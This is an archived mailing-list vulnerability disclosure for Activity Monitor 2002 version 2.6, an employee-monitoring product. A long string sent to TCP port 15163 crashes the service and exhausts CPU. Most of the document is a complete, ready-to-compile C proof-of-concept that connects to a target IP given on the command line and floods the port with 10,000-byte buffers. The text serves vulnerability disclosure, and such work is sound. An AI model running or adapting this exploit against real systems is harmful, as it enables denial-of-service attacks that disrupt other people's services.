('binary' encoding is not supported, stored as-is) Overview: "Activity Monitor 2002 is a monitoring software system for real time employee monitoring and continuous tracking of users activities on networked computers." More information can be found at www.softactivity.com Vulnerability Description: By connecting TCP port 15163 and sending a long string, a remote attacker could cause the application to crash and exhaust CPU resources. Affected Software: Activity Monitor 2002 ver. 2.6 Exploit: #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <string.h> int main(int argc, char **argv) { int i,ck,port,sd; char dos[10000]; struct sockaddr_in act_mon_server; if(argc < 2) { printf("\nUsage: %s <ip>\n", argv[0]); exit(0); } port = 15163; for(i = 0; i < 10000; i++) dos[i] = 'x'; act_mon_server.sin_family = AF_INET; act_mon_server.sin_port = htons((u_short)port); act_mon_server.sin_addr.s_addr = (long)inet_addr(argv[1]); sd = socket(AF_INET, SOCK_STREAM, 0); ck = connect(sd, (struct sockaddr *) &act_mon_server, sizeof (act_mon_server)); if(ck != 0) { perror("Connect"); exit(0); } printf("\n\t\tProof of Concept Activity Monitor 2002 DoS\n"); printf("\t\tby Luca Ercoli luca.ercoliat_private\n\n"); write(sd, dos, sizeof(dos)); write(sd, dos, sizeof(dos)); write(sd, dos, sizeof(dos)); printf("\nDoS sent!\n"); close(sd); exit(0); }
This archive was generated by hypermail 2b30 : Fri May 30 2003 - 00:10:58 PDT